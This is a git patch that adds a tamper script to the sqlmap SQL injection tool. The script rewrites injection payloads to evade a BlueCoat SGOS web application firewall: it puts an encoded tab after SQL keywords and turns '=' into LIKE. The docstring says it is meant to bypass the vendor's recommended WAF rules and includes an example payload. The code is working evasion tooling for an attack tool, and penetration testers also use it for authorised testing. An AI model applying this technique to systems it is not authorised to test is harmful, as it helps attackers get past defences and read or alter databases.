From 60aa7a7cd0e5d38961a5055731456a44d033d9e9 Mon Sep 17 00:00:00 2001 From: Thanatos Date: Sat, 3 Nov 2012 19:15:22 +0100 Subject: [PATCH] Tamper for BlueCoat SGos WAF --- tamper/bluecoat.py | 55 ++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 55 insertions(+) create mode 100644 tamper/bluecoat.py diff --git a/tamper/bluecoat.py b/tamper/bluecoat.py new file mode 100644 index 000000000..a6bc5b1fb --- /dev/null +++ b/tamper/bluecoat.py @@ -0,0 +1,55 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2012 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import os +import re + +from lib.core.common import singleTimeWarnMessage +from lib.core.enums import DBMS +from lib.core.enums import PRIORITY + +__priority__ = PRIORITY.LOW + +def dependencies(): + singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) + +def process(match): + word = match.group() + word = "%sLIKE%s" % (" " if word[0] != " " else "", " " if word[-1] != " " else "") + return word + +def tamper(payload, headers=None): + """ + First Replaces the space after 'select ' with a valid random blank character. + Then replace = with like + + Example: + * Input: SELECT id FROM users where id = 1 + * Output: SELECT%09id FROM users where id like 1 + + Requirement: + * MySQL, Bluecoat SGos with Waf activated as documented in + https://kb.bluecoat.com/index?page=content&id=FAQ2147 + + Tested against: + * MySQL 5.1, SGos Rules + + Notes: + * Useful to bypass BlueCoat recommanded Waf rule configuration + """ + +# ASCII table: +# TAB 09 horizontal TAB + blanks = '%09' + retVal = payload + + if payload: + for commands in ['SELECT','UPDATE','INSERT','DELETE']: + retVal = retVal.replace(commands + ' ', commands + blanks) + retVal = re.sub(r"\s*=\s*", lambda match: process(match), retVal) + + return retVal